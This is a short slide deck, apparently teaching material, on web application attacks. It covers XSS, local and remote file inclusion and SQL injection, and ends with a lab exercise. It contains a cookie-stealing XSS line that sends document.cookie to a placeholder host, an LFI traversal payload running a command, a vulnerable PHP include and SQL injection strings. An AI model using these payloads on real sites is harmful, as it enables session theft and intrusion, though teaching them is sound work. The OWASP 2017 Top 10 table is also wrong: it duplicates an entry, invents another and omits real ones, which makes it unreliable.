3.2 KiB
3.2 KiB
Slide 1: Web Application Attacks
- Web applications can be written in various languages, each with its specific vulnerability classes.
- Main attack vectors are similar in concept.
- OWASP promotes security awareness and solutions for web application development.
Slide 2: OWASP Top-10 Security Risks
| Risk | Description |
|---|---|
| A1:2017 - Injection | Attacker can add malicious SQL, NoSQL, or command strings. |
| A2:2017 - Broken Authentication | Compromised credentials, weak defaults, or exposed keys. |
| A3:2017 - Sensitive Data Exposure | Unprotected data at rest or in transit. |
| A4:2017 - XML External Entity (XXE) | Attacker can exploit parsing of XML outside the standard. |
| A5:2017 - Security Misconfiguration | Default configurations, open cloud storage, misconfigured HTTP headers. |
| A6:2017 - Using Components with Known Vulnerabilities | Outdated or vulnerable libraries and frameworks. |
| A7:2017 - Insufficient Logging & Monitoring | Lack of logging and monitoring prevents detection of attacks. |
| A8:2017 - Insecure Deserialization | Vulnerable deserialization can lead to remote code execution. |
| A9:2017 - Using Known Vulnerable Components without Patching | Outdated software with known vulnerabilities. |
| A10:2017 - Insufficient Transport Layer Protection | Weak or no encryption, allowing man-in-the-middle attacks. |
Slide 3: Cross-Site Scripting (XSS)
- Unsanitized user input displayed as HTML.
- Allows malicious scripts to run in victim's browser.
- Reflected (non-persistent): injected script runs immediately when the victim clicks the link.
- Stored (persistent): web application delivers payload to the victim, script runs when viewed.
- Impact: cookie stealing, authentication bypass, redirection.
Slide 4: XSS Example
- Reflected XSS:
<h1>XSS demo</h1>
<?php echo "Hello ". $_GET['name'];?>
- Stored XSS:
<script>alert(1)</script>
Slide 5: Cookie Stealing via XSS
- JavaScript can make victim's browser send cookies to the attacker.
new Image().src="http://example.com/bogus.php?output="+document.cookie;
Slide 6: File Inclusion Vulnerabilities
- Local File Inclusion (LFI) and Remote File Inclusion (RFI):
- LFI: includes local files.
- RFI: introduces own code to the webserver.
- Exploit depends on PHP versions and web server configurations.
Slide 7: LFI Demonstration
- Unsanitized
langparameter:
<?php $lang=$_GET['lang']; include $lang.".php";?>
- Payload:
../uploads/avatars/image.jpg%00&cmd=ifconfig
Slide 8: SQL Injection
- Unsanitized user input passed to a database query.
- Manipulating data can change the nature of the query.
- Examples:
- Bypassing authentication with
' OR '1'='1 - Extracting data using
' union select * from information_schema.columns --
- Bypassing authentication with
Exercise:
- Using OWASP Broken Web Applications project, demonstrate obtaining a shell with:
- An LFI vulnerability in the web application with file upload.
- An LFI vulnerability in the web application with contaminated logs.
- An RFI vulnerability in the web application.
- Demonstrate attacks using SQL injection and Cross Site Scripting (XSS).
- Provide documentation and proof of useful attacks in your report.